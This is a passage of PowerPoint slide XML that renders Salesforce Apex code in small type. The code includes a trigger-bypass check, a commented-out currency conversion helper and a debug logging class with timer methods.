              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexForcedBypass.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>));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dirty="0" smtClean="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Uncomment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>activated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>currency</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> Double </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>convertToCorporateCurrency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>currencyIsoCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>, Double </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       if(!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>currencyRate.containsKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>currencyIsoCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>               for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrencyType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>curType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>: [SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>IsoCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ConversionRate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrencyType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>IsActive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>               currencyRate.put(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>curType.IsoCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>curType.ConversionRate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>/currencyRate.get(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>currencyIsoCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>}*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>/**********************</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>Visual Force part </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>below</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>***********************/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class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>{//One log entry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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>timer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;}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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;}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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;}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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>rowCSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;}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(String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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>){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.timer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>DateTime.now().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>HH:mm:ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> , SS\'ms\'');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.reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=message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}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(String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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason,String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>rowCSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>){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.timer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>DateTime.now().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>HH:mm:ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> , SS\'ms\'');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.reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=message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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>.rowCSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>rowCSS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}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Long starter;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List&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> List&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>&gt;();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dirty="0" err="1" smtClean="0"/>
              <a:t>startTimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       starter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>DateTime.now().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>();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('&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>/custom51_100/stopwatch16.gif" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>="16px" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>="16px"');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dirty="0" err="1" smtClean="0"/>
              <a:t>stopTimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(starter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>/custom51_100/stopwatch16.gif" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>="16px" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>="16px" /&gt;&lt;i&gt; '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>String.ValueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(DateTime.now().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>starter)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>' ms&lt;/i&gt;');}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(String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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason,String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>rowColor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,reason,rowColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>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(String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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason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,reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>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(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>message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b="1" dirty="0" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>,''));}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Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>message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dirty="0" err="1" smtClean="0"/>
              <a:t>String.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>),''));}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Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason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dirty="0" err="1" smtClean="0"/>
              <a:t>String.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>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Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>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,Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason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dirty="0" err="1" smtClean="0"/>
              <a:t>String.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>String.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>)));}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b="1" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(String 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,Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>){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PAD_logs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>()&lt;1000)PAD_logs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
